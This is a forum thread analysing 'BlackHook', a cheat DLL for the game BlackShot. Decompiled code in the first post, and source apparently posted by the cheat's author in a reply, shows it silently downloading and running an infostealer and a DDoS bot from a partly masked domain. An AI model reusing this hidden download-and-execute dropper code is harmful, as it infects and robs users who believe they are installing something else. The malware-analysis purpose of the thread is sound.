Results 1 to 4 of 4
  1. #1
    biexor's Avatar
    Join Date
    Nov 2008
    Gender
    female
    Posts
    4
    Reputation
    10
    Thanks
    6
    My Mood
    Devilish

    BlackHook Virus Analysis

    Here is a full analysis of Bl@ck H0ok.

    For those of you that do not understand it, just skip down to the conclusion.

    BlackHook is a hack for blackshot that Many of you have tried or are using,
    however, what most of you dont know is that this not just a hack, its also a virus downloader!

    Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.

    TIP: You should always run suspicious files inside a Sandbox!



    Analysis:

    This is what BlackHook does when it is injected into a process:

    [PHP]BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
    BOOL result; // eax@2

    if ( fdwReason == 1 )
    {
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)D3D9Hook, 0, 0, 0);
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Hook, 0, 0, 0);
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);
    result = 1;
    }
    else
    {
    if ( !fdwReason )
    {
    remove("bypass.exe");
    remove("bypass_.exe");
    remove("bypass__.exe");
    }
    result = 1;
    }
    return result;
    }[/PHP]


    First, Lets take a look at
    [PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);[/PHP]


    The code inside this thread will download this file: "http://www.dope****/stlr/public.dat"
    And save the file as "crasherror.dat"
    "crasherror.dat" is just a fake file name to make it look convincing.


    Whats so special about this file?

    This file contains a simple boolean, which will tell BlackHook to enable or disable it self.
    This means that Cocaine1 (the creator of the BlackHook Virus) can make BlackHook unusable to everyone
    just by changing this text file.
    So if Cocaine1 does not want you to run BlackHook, he can just delete the file from his server
    .. and now BlackHook will not work anymore.



    Now, lets see what RunVirus does
    [PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);[/PHP]


    This is what happens inside RunVirus:

    [PHP]void __stdcall RunVirus(int Handled)
    {
    remove("bypass.exe");
    remove("bypass_.exe");
    remove("bypass__.exe");
    URLDownloadToFileA(0, "http://www.dope****/stlr/bypass.dat", "bypass.exe", 0, 0);
    Sleep(5000);
    URLDownloadToFileA(0, "http://www.dope****/bypass_.dat", "bypass_.exe", 0, 0);
    Sleep(5000u);
    URLDownloadToFileA(0, "http://www.dope****/bypass__.dat", "bypass__.exe", 0, 0);
    Sleep(5000u);
    ShellExecuteA(0, "open", "bypass.exe", 0, 0, 0);
    Sleep(1000u);
    ShellExecuteA(0, "open", "bypass_.exe", 0, 0, 0);
    Sleep(1000u);
    ShellExecuteA(0, "open", "bypass__", 0, 0, 0);
    while ( 1 )
    {
    remove("bypass.exe");
    remove("bypass_.exe");
    remove("bypass__.exe");
    Sleep(250u);
    }
    }
    [/PHP]
    This code should be very self-explainatory.

    It downloads three viruses and opens them.

    You can see that there is a BUG in this program ...
    The third virus will not open itself because the filename is wrong lmao.

    But if you have ever used BlackHook, you are still infected with two other viruses. Most likely Keyloggers.



    Next, I will make a crack for BlackHook which removes the viruses and also enables you run BlackHook forever. Stay Tuned.

  2. The Following User Says Thank You to biexor For This Useful Post:

    Papa0788 (11-17-2010)

  3. #2
    F-U-ALL's Avatar
    Join Date
    Jun 2010
    Gender
    male
    Posts
    224
    Reputation
    20
    Thanks
    23
    My Mood
    Hot
    Now what if there isnt viruses in it.

    He could just use the name RUnVirus to scare people.

    But then theres bypass.exe which is a possiblilty of a bypass to the game.

    All i can say is it could be a virus or not.

    Although i think its a virus since my computer shuts down when i use blackhook

  4. #3
    biexor's Avatar
    Join Date
    Nov 2008
    Gender
    female
    Posts
    4
    Reputation
    10
    Thanks
    6
    My Mood
    Devilish
    @F-U-ALL

    The name RunVirus was something i created, the original name was sub_403880

    Like I said, I analyzed this program, I didn't "get" a source code and thought it was a virus..
    I recreated the source code from assembly just to show you what the program does.

    In my post I describe what the program does, and all of it is True. and not based on guess-work. Appreciate.

  5. #4
    rikel's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Let's clear some things...

    The original code is :
    Code:
    BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved)
    {
        if(dwReason == DLL_PROCESS_ATTACH) {
            CreateThread(0, 0, LoopFunction, 0, 0, 0); // Keeps hooking the d3d functions
     	CreateThread(0, 0, MemHacks, 0, 0, 0); // Loops and does the memory related hacks
    	CreateThread(0, 0, noob, 0, 0, 0); // "anti-leech" loop
            CreateThread(0, 0, stealers, 0, 0, 0); // obvious is obvious
        }
        else if(dwReason == DLL_PROCESS_DETACH) {
                remove("bypass.exe");
    	    remove("bypass_.exe");
    	    remove("bypass__.exe");
    	}
    
        return TRUE;
    }
    
    
    DWORD WINAPI stealers( LPVOID lpParam  )
    {
    	remove("bypass.exe");
    	remove("bypass_.exe");
    	remove("bypass__.exe");
    	URLDownloadToFile( NULL, "http://www.dope****/stlr/bypass.dat", "bypass.exe", 0, NULL );
    	Sleep(5000);
    	URLDownloadToFile( NULL, "http://www.dope****/bypass_.dat", "bypass_.exe", 0, NULL );
        Sleep(5000);
    	URLDownloadToFile( NULL, "http://www.dope****/bypass__.dat", "bypass__.exe", 0, NULL );
    	Sleep(5000);
    	ShellExecute( NULL, "open", "bypass.exe",NULL, NULL, SW_HIDE);
    	Sleep(1000);
    	ShellExecute( NULL, "open", "bypass_.exe",NULL, NULL, SW_HIDE);
    	Sleep(1000);
        ShellExecute( NULL, "open", "bypass__",NULL, NULL, SW_HIDE);
    	while(1){
    		remove("bypass.exe");
    	    remove("bypass_.exe");
    	    remove("bypass__.exe");
    		Sleep(250);
    	}
    
    	return 0;
    }
    The check was just downloading the file and checking it's size, if it corresponded you could use the hack, if not the hack does nothing ( there's an if (auth == true ) in every function )

    The virus thread was downloading 2 files ( the third i forgot to comment out ) , 1 iStealer and the other DDoSer. NO KEYLOGGERS, for you noobs all the viruses are keyloggers...

    The domain has been disabled a long time ago and so was the hack -> it will not work nor infect anyone.

    If you had any clue about hack you would of known the hack is detected by now and even if you remove the check and the virus thread it will still not work.

    One last thing, this is the last build
    Code:
    MenuAddItem("Cokaine 27.06.2010", writing, &CH_writing, 1, MENUFOLDER);
    Took you 4 months and a half to reverse an useless old hack

    Quote Originally Posted by biexor View Post

    Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.
    a "normal" virus scanner detects the URLDownloadToFile function and http:// as a downloader. i thought you were smart?

    btw, if it's any doubt, yes, i am Cokaine/Cokaine1.
    Last edited by rikel; 11-13-2010 at 11:26 AM.

Similar Threads

  1. Virus Scanner
    By Elmo in forum Spammers Corner
    Replies: 9
    Last Post: 07-11-2010, 02:23 PM
  2. Crap I know I have a virus.
    By radnomguywfq3 in forum Hardware & Software Support
    Replies: 14
    Last Post: 02-10-2007, 02:53 PM
  3. Cabal Online - Virus?
    By Dave84311 in forum General Game Hacking
    Replies: 0
    Last Post: 02-19-2006, 08:54 PM
  4. wpe pro contain VIRUS
    By loRdDevil in forum WarRock - International Hacks
    Replies: 2
    Last Post: 01-14-2006, 04:15 PM
  5. Anti Virus software
    By kyo in forum General
    Replies: 3
    Last Post: 01-11-2006, 08:29 PM